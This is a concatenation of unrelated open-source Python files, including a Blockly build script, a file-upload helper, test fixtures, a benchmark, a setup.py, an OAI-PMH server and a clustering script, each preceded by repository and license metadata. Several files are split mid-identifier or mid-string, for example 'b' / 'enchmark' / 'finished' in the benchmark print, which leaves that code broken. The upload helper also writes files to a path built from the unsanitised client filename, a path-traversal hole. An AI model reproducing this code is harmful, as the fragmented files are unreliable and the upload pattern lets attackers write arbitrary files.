Uses the Closure Compiler's online API.
Runs in a separate thread.
"""
def __init__(self, search_paths_vertical, search_paths_horizontal):
threading.Thread.__init__(self)
self.search_paths_vertical = search_paths_vertical
self.search_paths_horizontal = search_paths_horizontal
def run(self):
self.gen_core(True)
self.gen_core(False)
self.gen_blocks("horizontal")
self.gen_blocks("vertical")
self.gen_blocks("common")
self.gen_generator("arduino")
def gen_core(self, vertical):
if vertical:
target_filename = 'blockly_compressed_vertical.js'
search_paths = self.search_paths_vertical
else:
target_filename = 'blockly_compressed_horizontal.js'
search_paths = self.search_paths_horizontal
# Define the parameters for the POST request.
params = [
("compilation_level", "SIMPLE_OPTIMIZATIONS"),
("use_closure_library", "true"),
("output_format", "json"),
("output_info", "compiled_code"),
("output_info", "warnings"),
("output_info", "errors"),
("output_info", "statistics"),
]
# Read in all the source files.
filenames = calcdeps.CalculateDependencies(search_paths,
[os.path.join("core", "blockly.js")])
for filename in filenames:
# Filter out the Closure files (the compiler will add them).
if filename.startswith(os.pardir + os.sep): # '../'
continue
f = open(filename)
params.append(("js_code", "".join(f.readlines())))
f.close()
self.do_compile(params, target_filename, filenames, "")
def gen_blocks(self, block_type):
if block_type == "horizontal":
target_filename = "blocks_compressed_horizontal.js"
filenames = glob.glob(os.path.join("blocks_horizontal", "*.js"))
elif block_type == "vertical":
target_filename = "blocks_compressed_vertical.js"
filenames = glob.glob(os.path.join("blocks_vertical", "*.js"))
elif block_type == "common":
target_filename = "blocks_compressed.js"
filenames = glob.glob(os.path.join("blocks_common", "*.js"))
# Define the parameters for the POST request.
params = [
|
unixhot/opencmdb
|
util/util.py
|
Python
|
apache-2.0
| 366 | 0.008197 |
import hashlib
def handle_uploaded_file(f):
img_url = 'media/image/' + CalcMD5(f) + f._name
with open(img_url, 'wb+') as destination:
for chunk in f.chunks():
destination.write(chunk)
return ('/' + img_url, f._name)
def CalcMD5(f):
md5obj = hashlib.md5()
md5obj.update(f.read())
hash = md5obj.hexdigest()
return hash
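# Hedged usage sketch (illustrative, added here): in a Django view, values
# from request.FILES provide the .chunks()/.read()/._name interface that
# handle_uploaded_file() and CalcMD5() expect:
#
#   img_url, original_name = handle_uploaded_file(request.FILES['image'])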
|
morgangalpin/duckomatic
|
tests/test_main.py
|
Python
|
gpl-3.0
| 1,476 | 0 |
# -*- coding: utf-8 -*-
# from pytest import raises
# The parametrize function is generated, so this doesn't work:
#
# from pytest.mark import parametrize
#
import pytest
parametrize = pytest.mark.parametrize
# from duckomatic import metadata
# TODO: Importing this is broken because six.moves.urllib gives
# an import error.
# from duckomatic.__main__ import main
class TestMain(object):
def test_fake(self):
pass
# @parametrize('helparg', ['-h', '--help'])
# def test_help(self, helparg, capsys):
# with raises(SystemExit) as exc_info:
# main(['progname', helparg])
# out, err = capsys.readouterr()
# # Should have printed some sort of usage message. We don't
# # need to explicitly test the content of the message.
# assert 'usage' in out
# # Should have used the program name from the argument
# # vector.
# assert 'progname' in out
# # Should exit with zero return code.
# assert exc_info.value.code == 0
# @parametrize('versionarg', ['-V', '--version'])
# def test_version(self, versionarg, capsys):
# with raises(SystemExit) as exc_info:
# main(['progname', versionarg])
# out, err = capsys.readouterr()
# # Should print out version.
# assert err == '{0} {1}\n'.format(metadata.project, metadata.version)
# # Should exit with zero return code.
# assert exc_info.value.code == 0
|
onecloud/neutron
|
neutron/tests/functional/agent/linux/base.py
|
Python
|
apache-2.0
| 2,637 | 0 |
# Copyright 2014 Cisco Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import random
from neutron.agent.linux import ovs_lib
from neutron.agent.linux import utils
from neutron.common import constants as n_const
from neutron.tests import base
BR_PREFIX = 'test-br'
class BaseLinuxTestCase(base.BaseTestCase):
def setUp(self, root_helper='sudo'):
super(BaseLinuxTestCase, self).setUp()
self.root_helper = root_helper
def check_command(self, cmd, error_text, skip_msg):
try:
utils.execute(cmd)
except RuntimeError as e:
if error_text in str(e):
self.skipTest(skip_msg)
raise
def check_sudo_enabled(self):
if os.environ.get('OS_SUDO_TESTING') not in base.TRUE_STRING:
self.skipTest('testing with sudo is not enabled')
def get_rand_name(self, max_length, prefix='test'):
name = prefix + str(random.randint(1, 0x7fffffff))
return name[:max_length]
def create_resource(self, name_prefix, creation_func, *args, **kwargs):
"""Create a new resource that does not already exist.
:param name_prefix: The prefix for a randomly generated name
:param creation_func: A function taking the name of the resource
to be created as its first argument. An error is assumed
to indicate a name collision.
:param *args *kwargs: These will be passed to the create function.
"""
while True:
name = self.get_rand_name(n_const.DEV_NAME_MAX_LEN, name_prefix)
try:
return creation_func(name, *args, **kwargs)
except RuntimeError:
continue
class BaseOVSLinuxTestCase(BaseLinuxTestCase):
def setUp(self, root_helper='sudo'):
super(BaseOVSLinuxTestCase, self).setUp(root_helper)
self.ovs = ovs_lib.BaseOVS(self.root_helper)
def create_ovs_bridge(self, br_prefix=BR_PREFIX):
br = self.create_resource(br_prefix, self.ovs.add_bridge)
self.addCleanup(br.destroy)
return br
|
stdlib-js/stdlib
|
lib/node_modules/@stdlib/math/base/special/cexp/benchmark/python/benchmark.py
|
Python
|
apache-2.0
| 2,220 | 0.00045 |
#!/usr/bin/env python
#
# @license Apache-2.0
#
# Copyright (c) 2018 The Stdlib Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Benchmark cexp."""
from __future__ import print_function
import timeit
NAME = "cexp"
REPEATS = 3
ITERATIONS = 1000000
def print_version():
"""Print the TAP version."""
print("TAP version 13")
def print_summary(total, passing):
"""Print the benchmark summary.
# Arguments
* `total`: total number of tests
* `passing`: number of passing tests
"""
print("#")
print("1.." + str(total)) # TAP plan
print("# total " + str(total))
print("# pass " + str(passing))
print("#")
print("# ok")
def print_results(elapsed):
"""Print benchmark results.
# Arguments
* `elapsed`: elapsed time (in seconds)
# Examples
``` python
python> print_results(0.131009101868)
```
"""
rate = ITERATIONS / elapsed
print(" ---")
print(" iterations: " + str(ITERATIONS))
print(" elapsed: " + str(elapsed))
print(" rate: " + str(rate))
print(" ...")
def benchmark():
"""Run the benchmark and print benchmark results."""
setup = "from random import random; from cmath import exp;"
stmt = "re = (random()*100.0) - 50.0; im = (random()*100.0) - 50.0; y = exp(re + 1.0j * im);"
t = timeit.Timer(stmt, setup=setup)
print_version()
for i in range(REPEATS):
print("# python::" + NAME)
elapsed = t.timeit(number=ITERATIONS)
print_results(elapsed)
print("ok " + str(i+1) + " b
|
enchmark
|
finished")
print_summary(REPEATS, REPEATS)
def main():
"""Run the benchmark."""
benchmark()
if __name__ == "__main__":
main()
|
facebookexperimental/eden
|
eden/hg-server/tests/get-with-headers.py
|
Python
|
gpl-2.0
| 2,434 | 0.000411 |
#!/usr/bin/env python
"""This does HTTP GET requests given a host:port and path and returns
a subset of the headers plus the body of the result."""
from __future__ import absolute_import, print_function
import json
import os
import sys
from edenscm.mercurial import util
httplib = util.httplib
try:
import msvcrt
msvcrt.setmode(sys.stdout.fileno(), os.O_BINARY)
msvcrt.setmode(sys.stderr.fileno(), os.O_BINARY)
except ImportError:
pass
twice = False
if "--twice" in sys.argv:
sys.argv.remove("--twice")
twice = True
headeronly = False
if "--headeronly" in sys.argv:
sys.argv.remove("--headeronly")
headeronly = True
formatjson = False
if "--json" in sys.argv:
sys.argv.remove("--json")
formatjson = True
hgproto = None
if "--hgproto" in sys.argv:
idx = sys.argv.index("--hgproto")
hgproto = sys.argv[idx + 1]
sys.argv.pop(idx)
sys.argv.pop(idx)
tag = None
def request(host, path, show):
assert not path.startswith("/"), path
global tag
headers = {}
if tag:
headers["If-None-Match"] = tag
if hgproto:
headers["X-HgProto-1"] = hgproto
conn = httplib.HTTPConnection(host)
conn.request("GET", "/" + path, None, headers)
response = conn.getresponse()
print(response.status, response.reason)
if show[:1] == ["-"]:
show = sorted(h for h, v in response.getheaders() if h.lower() not in show)
for h in [h.lower() for h in show]:
if response.getheader(h, None) is not None:
print("%s: %s" % (h, response.getheader(h)))
if not headeronly:
print()
data = response.read()
# Pretty print JSON. This also has the beneficial side-effect
# of verifying emitted JSON is well-formed.
if formatjson:
# json.dumps() will print trailing newlines. Eliminate them
# to make tests easier to write.
data = json.loads(data)
lines = json.dumps(data, sort_keys=True, indent=2).splitlines()
for line in lines:
print(line.rstrip())
else:
sys.stdout.write(data)
if twice and response.getheader("ETag", None):
tag = response.getheader("ETag")
return response.status
status = request(sys.argv[1], sys.argv[2], sys.argv[3:])
if twice:
status = request(sys.argv[1], sys.argv[2], sys.argv[3:])
if 200 <= status <= 305:
sys.exit(0)
sys.exit(1)
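# Hypothetical invocations (host, port, path and header names are examples):
#
#     python get-with-headers.py localhost:20059 'rev/tip' content-type
#     python get-with-headers.py --json localhost:20059 'api/status' content-type
#
# The exit status is 0 for response codes 200..305 and 1 otherwise.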
|
mcanthony/nupic
|
setup.py
|
Python
|
agpl-3.0
| 4,025 | 0.00472 |
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2015, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""Installation script for Python nupic package."""
import os
import setuptools
import sys
from setuptools import setup, find_packages, Extension
REPO_DIR = os.path.dirname(os.path.realpath(__file__))
def getVersion():
"""
    Get version from local file.
"""
with open(os.path.join(REPO_DIR, "VERSION"), "r") as versionFile:
return versionFile.read().strip()
def parse_file(requirementFile):
try:
return [
line.strip()
for line in open(requirementFile).readlines()
if not line.startswith("#")
]
except IOError:
return []
def findRequirements():
"""
Read the requirements.txt file and parse into requirements for setup's
install_requirements option.
"""
requirementsPath = os.path.join(REPO_DIR, "external", "common",
"requirements.txt")
requirements = parse_file(requirementsPath)
return requirements
if __name__ == "__main__":
requirements = findRequirements()
setup(
name="nupic",
version=getVersion(),
install_requires=requirements,
package_dir = {"": "src"},
packages=find_packages("src"),
namespace_packages = ["nupic"],
package_data={
"nupic.support": ["nupic-default.xml",
"nupic-logging.conf"],
"nupic": ["README.md", "LICENSE.txt"],
"nupic.data": ["*.json"],
"nupic.frameworks.opf.exp_generator": ["*.json", "*.tpl"],
"nupic.frameworks.opf.jsonschema": ["*.json"],
"nupic.swarming.exp_generator": ["*.json", "*.tpl"],
"nupic.swarming.jsonschema": ["*.json"],
"nupic.datafiles": ["*.csv", "*.txt"],
},
include_package_data=True,
zip_safe=False,
description="Numenta Platform for Intelligent Computing",
author="Numenta",
author_email="help@numenta.org",
url="https://github.com/numenta/nupic",
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"License :: OSI Approved :: GNU Affero General Public License v3 or later (AGPLv3+)",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX :: Linux",
# It has to be "5 - Production/Stable" or else pypi rejects it!
"Development Status :: 5 - Production/Stable",
"Environment :: Console",
"Intended Audience :: Science/Research",
"Topic :: Scientific/Engineering :: Artificial Intelligence"
],
long_description=(
"Numenta Platform for Intelligent Computing: a machine intelligence "
"platform that implements the HTM learning algorithms. HTM is a "
"detailed computational theory of the neocortex. At the core of HTM "
"are time-based continuous learning algorithms that store and recall "
"spatial and temporal patterns. NuPIC is suited to a variety of "
"problems, particularly anomaly detection and prediction of streaming "
"data sources.\n\n"
"For more information, see http://numenta.org or the NuPIC wiki at "
"https://github.com/numenta/nupic/wiki.")
)
|
RalfBarkow/Zettelkasten
|
venv/lib/python3.9/site-packages/pip/_internal/index/__init__.py
|
Python
|
gpl-3.0
| 30 | 0 |
"""Index
|
interaction code
"
|
""
|
rsalmei/clearly
|
clearly/utils/colors.py
|
Python
|
mit
| 1,146 | 0 |
from typing import List, TypeVar
C = TypeVar('C') # how to constrain to only the closure below?
def color_factory(color_code: str) -> C:
def apply(text: str, format_spec: str = '') -> str:
return color_code + format(text, format_spec) + '\033[0m'
def mix(*colors: C) -> List[C]:
return [color_factory(c.color_code + color_code) for c in colors]
apply.mix, apply.color_code = mix, color_code
return apply
class Colors:
BLUE = color_factory('\033[94m')
GREEN = color_factory('\033[92m')
YELLOW = color_factory('\033[93m')
RED = color_factory('\033[91m')
MAGENTA = color_factory('\033[95m')
CYAN = color_factory('\033[96m')
ORANGE = color_factory('\033[38;5;208m')
BOLD = color_factory('\033[1m')
DIM = color_factory('\033[2m')
BLUE_BOLD, BLUE_DIM = BLUE.mix(BOLD, DIM)
GREEN_BOLD, GREEN_DIM = GREEN.mix(BOLD, DIM)
YELLOW_BOLD, YELLOW_DIM = YELLOW.mix(BOLD, DIM)
RED_BOLD, RED_DIM = RED.mix(BOLD, DIM)
MAGENTA_BOLD, MAGENTA_DIM = MAGENTA.mix(BOLD, DIM)
CYAN_BOLD, CYAN_DIM = CYAN.mix(BOLD, DIM)
    ORANGE_BOLD, ORANGE_DIM = ORANGE.mix(BOLD, DIM)
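# A usage sketch (prints raw ANSI escape sequences; terminal support assumed):
#
#     print(Colors.GREEN('ok'))
#     print(Colors.RED_BOLD('fail', '>10'))   # format_spec forwarded to format()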
|
erinspace/osf.io
|
osf_tests/test_files.py
|
Python
|
apache-2.0
| 2,401 | 0.002499 |
import pytest
from django.contrib.contenttypes.models import ContentType
from addons.osfstorage import settings as osfstorage_settings
from osf.models import BaseFileNode, Folder, File
from osf_tests.factories import (
UserFactory,
ProjectFactory
)
pytestmark = pytest.mark.django_db
@pytest.fixture()
def user():
return UserFactory()
@pytest.fixture()
def project(user):
return ProjectFactory(creator=user)
@pytest.fixture()
def create_test_file(fake):
# TODO: Copied from api_tests/utils.py. DRY this up.
def _create_test_file(target, user=None, filename=None, create_guid=True):
filename = filename or fake.file_name()
user = user or target.creator
osfstorage = target.get_addon('osfstorage')
root_node = osfstorage.get_root()
test_file = root_node.append_file(filename)
if create_guid:
test_file.get_guid(create=True)
test_file.create_version(user, {
'object': '06d80e',
'service': 'cloud',
osfstorage_settings.WATERBUTLER_RESOURCE: 'osf',
}, {
'size': 1337,
'contentType': 'img/png'
}).save()
return test_file
return _create_test_file
def test_active_manager_does_not_return_trashed_file_nodes(project, create_test_file):
create_test_file(target=project)
deleted_file = create_test_file(target=project)
deleted_file.delete(user=project.creator, save=True)
content_type_for_query = ContentType.objects.get_for_model(project)
# root folder + file + deleted_file = 3 BaseFileNodes
assert BaseFileNode.objects.filter(target_object_id=project.id, target_content_type=content_type_for_query).count() == 3
    # root folder + file = 2 BaseFileNodes
    assert BaseFileNode.active.filter(target_object_id=project.id, target_content_type=content_type_for_query).count() == 2
def test_folder_update_calls_folder_update_method(project, create_test_file):
file = create_test_file(target=project)
parent_folder = file.parent
# the folder update method should be the Folder.update method
assert parent_folder.__class__.update == Folder.update
# the folder update method should not be the File update method
assert parent_folder.__class__.update != File.update
# the file update method should be the File update method
assert file.__class__.update == File.update
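# A hypothetical follow-on test built on the same factory fixture (filename is
# an example; get_guid() is used as in the fixture above):
#
#     def test_new_file_gets_guid(project, create_test_file):
#         test_file = create_test_file(target=project, filename='a.png')
#         assert test_file.get_guid() is not None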
|
ludmilamarian/invenio
|
invenio/legacy/oairepository/server.py
|
Python
|
gpl-2.0
| 34,384 | 0.006893 |
# This file is part of Invenio.
# Copyright (C) 2009, 2010, 2011, 2014, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""Receive OAI-PMH 2.0 requests and responds"""
__revision__ = "$Id$"
from six.moves import cPickle
import os
import re
import time
import tempfile
import sys
import datetime
if sys.hexversion < 0x2050000:
from glob import glob as iglob
else:
from glob import iglob
from flask import url_for, abort
from flask_login import current_user
from intbitset import intbitset
from six import iteritems
from invenio.config import \
CFG_BIBUPLOAD_EXTERNAL_OAIID_TAG, \
CFG_CACHEDIR, \
CFG_CERN_SITE, \
CFG_OAI_DELETED_POLICY, \
CFG_OAI_EXPIRE, \
CFG_OAI_FRIENDS, \
CFG_OAI_IDENTIFY_DESCRIPTION, \
CFG_OAI_ID_FIELD, \
CFG_OAI_ID_PREFIX, \
CFG_OAI_LOAD, \
CFG_OAI_METADATA_FORMATS, \
CFG_OAI_PREVIOUS_SET_FIELD, \
CFG_OAI_PROVENANCE_ALTERED_SUBFIELD, \
CFG_OAI_PROVENANCE_BASEURL_SUBFIELD, \
CFG_OAI_PROVENANCE_DATESTAMP_SUBFIELD, \
CFG_OAI_PROVENANCE_HARVESTDATE_SUBFIELD, \
CFG_OAI_PROVENANCE_METADATANAMESPACE_SUBFIELD, \
CFG_OAI_PROVENANCE_ORIGINDESCRIPTION_SUBFIELD, \
CFG_OAI_SAMPLE_IDENTIFIER, \
CFG_OAI_SET_FIELD, \
CFG_SITE_NAME, \
CFG_SITE_SUPPORT_EMAIL, \
CFG_SITE_URL, \
CFG_WEBSTYLE_HTTP_USE_COMPRESSION
from invenio.base.globals import cfg
from invenio.ext.logging import register_exception
from invenio.legacy.bibrecord import record_get_field_instances
from invenio.legacy.dbquery import run_sql, wash_table_column_name, \
datetime_format
from invenio.legacy.oairepository.config import CFG_OAI_REPOSITORY_GLOBAL_SET_SPEC
from invenio.legacy.search_engine import record_exists, \
search_unit_in_bibxxx, get_record
from invenio_formatter import format_record
from invenio.modules.search.api import Query
from invenio.utils.date import localtime_to_utc, utc_to_localtime
from invenio.utils.html import X, EscapedXMLString
CFG_VERBS = {
'GetRecord' : ['identifier', 'metadataPrefix'],
'Identify' : [],
'ListIdentifiers' : ['from', 'until',
'metadataPrefix',
'set',
'resumptionToken'],
'ListMetadataFormats': ['identifier'],
'ListRecords' : ['from', 'until',
'metadataPrefix',
'set',
'resumptionToken'],
'ListSets' : ['resumptionToken']
}
CFG_ERRORS = {
"badArgument": "The request includes illegal arguments, is missing required arguments, includes a repeated argument, or values for arguments have an illegal syntax:",
"badResumptionToken": "The value of the resumptionToken argument is invalid or expired:",
"badVerb": "Value of the verb argument is not a legal OAI-PMH verb, the verb argument is missing, or the verb argument is repeated:",
"cannotDisseminateFormat": "The metadata format identified by the value given for the metadataPrefix argument is not supported by the item or by the repository:",
"idDoesNotExist": "The value of the identifier argument is unknown or illegal in this repository:",
"noRecordsMatch": "The combination of the values of the from, until, set and metadataPrefix arguments results in an empty list:",
"noMetadataFormats": "There are no metadata formats available for the specified item:",
"noSetHierarchy": "The repository does not support sets:"
}
CFG_MIN_DATE = "1970-01-01T00:00:00Z"
CFG_MAX_DATE = "9999-12-31T23:59:59Z"
def get_all_field_values(tag):
"""
Return all existing values stored for a given tag.
@param tag: the full tag, e.g. 909C0b
@type tag: string
@return: the list of values
@rtype: list of strings
"""
table = 'bib%02dx' % int(tag[:2])
return [row[0] for row in run_sql("SELECT DISTINCT(value) FROM %s WHERE tag=%%s" % table, (tag, ))]
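# Worked example of the tag-to-table mapping above (tag value hypothetical):
# for tag = '909C0b', int(tag[:2]) == 90, so the DISTINCT query runs against
# table 'bib90x'.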
def oai_error(argd, errors):
"""
Return a well-formatted OAI-PMH error
"""
out = """<?xml version="1.0" encoding="UTF-8"?>
<OAI-PMH xmlns="http://www.openarchives.org/OAI/2.0/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.openarchives.org/OAI/2.0/
http://www.openarchives.org/OAI/2.0/OAI-PMH.xsd">"""
out += X.responseDate()(get_utc_now())
for error_code, error_msg in errors:
assert(error_code in CFG_ERRORS)
if error_code in ("badArgument", "badVerb"):
out += X.request()(oai_get_request_url())
break
else:
## There are no badArgument or badVerb errors so we can
## return the whole request information
out += X.request(**argd)(oai_get_request_url())
for error_code, error_msg in errors:
if error_msg is None:
error_msg = CFG_ERRORS[error_code]
else:
error_msg = "%s %s" % (CFG_ERRORS[error_code], error_msg)
out += X.error(code=error_code)(error_msg)
out += "</OAI-PMH>"
return out
def oai_header(argd, verb):
"""
Return OAI header
"""
out = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>" + "\n"
out += "<?xml-stylesheet type=\"text/xsl\" href=\"%s\" ?>\n" % (
url_for('oairepository.static',
filename='xsl/oairepository/oai2.xsl.v1.0'))
out += "<OAI-PMH xmlns=\"http://www.openarchives.org/OAI/2.0/\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xsi:schemaLocation=\"http://www.openarchives.org/OAI/2.0/ http://www.openarchives.org/OAI/2.0/OAI-PMH.xsd\">\n"
#out += "<responseDate>%s</responseDate>" % get_utc_now()
out += X.responseDate()(get_utc_now())
if verb:
out += X.request(**argd)(oai_get_request_url())
out += "<%s>\n" % verb
else:
out += X.request()(oai_get_request_url())
return out
def oai_footer(verb):
"""
    @return: the OAI footer.
"""
out = ""
if verb:
out += "</%s>\n
|
" % (verb)
out += "</OAI-PMH>\n"
return out
def get_field(recid, field):
"""
Gets list of field 'field' for the record with 'recid' system number.
"""
digit = field[0:2]
bibbx = "bib%sx" % digit
bibx = "bibrec_bib%sx" % digit
query = "SELECT bx.value FROM %s AS bx, %s AS bibx WHERE bibx.id_bibrec=%%s AND bx.id=bibx.id_bibxxx AND bx.tag=%%s" % (wash_table_column_name(bibbx), wash_table_column_name(bibx))
return [row[0] for row in run_sql(query, (recid, field))]
def get_modification_date(recid):
"""Returns the date of last modification for the record 'recid'.
Return empty string if no record or modification date in UTC.
"""
out = ""
res = run_sql("SELECT " + datetime_format('modification_date') + " FROM bibrec WHERE id=%s", (recid,), 1)
if res and res[0][0]:
out = localtime_to_utc(res[0][0])
return out
def get_earliest_datestamp():
"""Get earliest datestamp in the database
Return empty string if no records or earliest datestamp in UTC.
"""
out = CFG_MIN_DATE
res = run_sql("SELECT " + datetime_format('MIN(creation_date)', False) + " FROM bibrec", n=1)
if res and res[0][0]:
out = localtime_to_utc(res[0][0])
return out
def get_latest_datestamp():
"""Get latest datestamp in the database
Return empty string if no records or latest datestamp in UTC.
"""
out = CFG_MAX_DATE
res = run_sql("SELECT " + datetime_format('MAX(modification_date)', False) + " FROM bibrec", n=1)
|
rchurch4/georgetown-data-science-fall-2015
|
analysis/clusterings/clustering.py
|
Python
|
mit
| 4,732 | 0.01585 |
# clustering.py
# cluster yelp and TA data
#
# Rob Churchill
#
# NOTE: IN ORDER TO GET ANY VISUALIZATIONS OUT OF THIS SCRIPT,
# YOU MUST PUT THIS IN AN IPYTHON NOTEBOOK OR SOMETHING SIMILAR
#
# NOTE: I learned to do this in my data science class last semester. If you are looking for plagiarism things, you will almost certainly find similar clustering code.
# I did not copy it, I learned this specific way of doing it, and referred to my previous assignments when doing it for this project. If you would like to see my previous
# assignments, I will provide them to you on request. Otherwise, I don't think it's worth adding a lot of extra files for the sole sake of showing that I haven't plagiarized.
import scipy as sp
import numpy as np
import math
from sklearn.cluster import KMeans
import scipy.cluster.hierarchy as hr
from sklearn.cluster import DBSCAN
import csv
import matplotlib.pyplot as plt
import seaborn as sns
%matplotlib inline
folder = 'data/'
file_names = ['yelp_data.csv', 'trip_advisor_data.csv']
yelp_dataset = list()
#change the index of file_names in this line to 0 if you want to cluster yelp, 1 if you want to cluster trip advisor
with open(folder+file_names[1], 'r') as f:
reader = csv.reader(f)
for line in reader:
yelp_dataset.append(line)
# remove headers
yelp_dataset.remove(yelp_dataset[0])
# throw out the fields we don't need so that we have enough memory to cluster such a large dataset
new_yelp_ds = []
for y in yelp_dataset:
local = 0
if y[19] == "TRUE":
local = 1
if y[19] in ["FALSE", "TRUE"]:
for l in range(0, len(y)):
if y[l] == "NA":
y[l] = 0
if int(y[11]) > 99:
# mean_r
|
ating, distance
y = [float(y[21]), math.log(float(y[18])+1), math.log(int(y[6])+1)]
new_yelp_ds.append(y)
# this condensed dataset is now our working dataset
yelp_dataset = np.array(new_yelp_ds)
print len(yelp_dataset)
#print np.amax(yelp_dataset[:,1])
# start kmeans. try it with 1...11 clusters to see which is best. for both, it was two.
error = np.zeros(11)
error[0] = 0
for k in range(1,11):
kmeans = KMeans(n_clusters=k)
kmeans.fit_predict(yelp_dataset)
centroids = kmeans.cluster_centers_
labels = kmeans.labels_
error[k] = kmeans.inertia_
plt.plot(range(1,len(error)),error[1:])
plt.xlabel('Number of clusters')
plt.ylabel('Error')
# run kmeans on the optimal k
kmeans = KMeans(n_clusters=2, n_init=15)
kmeans.fit_predict(yelp_dataset)
centroids = kmeans.cluster_centers_
labels = kmeans.labels_
error = kmeans.inertia_
print labels
print error
# make it pretty and plot it. kmeans told us literally nothing about this dataset.
colors = []
for l in labels:
if l == 0:
colors.append('r')
elif l== 1:
colors.append('b')
elif l == 2:
colors.append('g')
elif l == 3:
colors.append('c')
else:
colors.append('m')
plt.scatter(yelp_dataset[:,1], yelp_dataset[:,2], c=colors, s=8, lw=0)
# set up dbscan, set the eps based on the website
# for yelp, use 0.25. For trip advisor use 0.5
dbscan = DBSCAN(eps = 0.5)
# run dbscan on the data
dbscan.fit_predict(yelp_dataset)
labels = dbscan.labels_
print labels
# make it pretty and plot it. dbscan highlights some major grouping of reviews in the data,
# especially the local and non-local groups.
colors = []
for l in labels:
if l == 0:
colors.append('r')
elif l== 1:
colors.append('b')
elif l == 2:
colors.append('g')
elif l == 3:
colors.append('c')
elif l == 4:
colors.append('y')
else:
colors.append('m')
plt.scatter(yelp_dataset[:,1], yelp_dataset[:,2], c=colors, s=8, lw=0)
# hierarchical clustering is a very memory consuming algorithm, so we can only take a small subset of the dataset
# we randomly permute and take the first 1000.
permutation = np.random.permutation(yelp_dataset)
small_ds = permutation[:1000]
# run the algorithm on our data
Z = hr.linkage(small_ds, method='complete', metric='euclidean')
print Z.shape, small_ds.shape
# plot the dendrogram to see how the clusters were created.
fig = plt.figure(figsize=(10,10))
T = hr.dendrogram(Z,color_threshold=0.4, leaf_font_size=1)
fig.show()
# cluster our data and get the labels for plotting.
labels = hr.fcluster(Z, t=7, depth=8)
#print labels
# make it pretty and plot it. hierarchical clustering, like kmeans, showed us nothing interesting.
colors = []
for l in labels:
if l == 0:
colors.append('r')
elif l== 1:
colors.append('b')
elif l == 2:
colors.append('r')
elif l == 3:
colors.append('c')
elif l == 4:
colors.append('y')
else:
colors.append('m')
plt.scatter(yelp_dataset[:,1], yelp_dataset[:,2], c=colors, s=8, lw=0)
|
noutenki/descriptors
|
descriptors/__init__.py
|
Python
|
mit
| 631 | 0 |
# descriptors.__init__
#
# Expose Descriptor, Validated,
|
and all descriptors so they can be
# imported via "from descriptors import ..."
from __future__ import print_function, unicode_literals, division
from descriptors.Descriptor import Descriptor
from descriptors.Validated import Validated
import descriptors.handmade as hm
import descriptors.massproduced as mm
_all_descriptors = set([
(obj_name, obj)
for module in (hm, mm)
for obj_name, obj in module.__dict__.items()
if obj.__class__.__name__ == "DescriptorMeta"])
_all_descriptors.discard(("Descriptor", Descriptor))
globals().update(_all_descriptors)
|
antont/tundra
|
src/Application/PythonScriptModule/pymodules_old/lib/webdav/acp/__init__.py
|
Python
|
apache-2.0
| 829 | 0 |
# Copyright 2008 German Aerospace Center (DLR)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from webdav.acp.Acl import ACL
from webdav.acp.Ace import ACE
from webdav.acp.GrantDeny import GrantDeny
from webdav.acp.Privilege import Privilege
from webdav.acp.Principal import Principal
__version__ = "$LastChangedRevision: 2 $"
|
JDougherty/mbtapy
|
setup.py
|
Python
|
apache-2.0
| 355 | 0.002817 |
from setuptools import setup
setup(
name="mbtapy",
version='0.1.0dev1',
    description='Python bindings for the MBTA-REALTIME API (v2)',
author="Joseph Dougherty",
author_email="mbtapy@jwdougherty.com",
url='https://github.com/JDougherty/mbtapy',
install_requires=['requests'],
license='LICENSE',
packages=['mbtapy'],
)
|
FR4NK-W/osourced-scion
|
python/lib/rev_cache.py
|
Python
|
apache-2.0
| 5,118 | 0.001172 |
# Copyright 2017 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
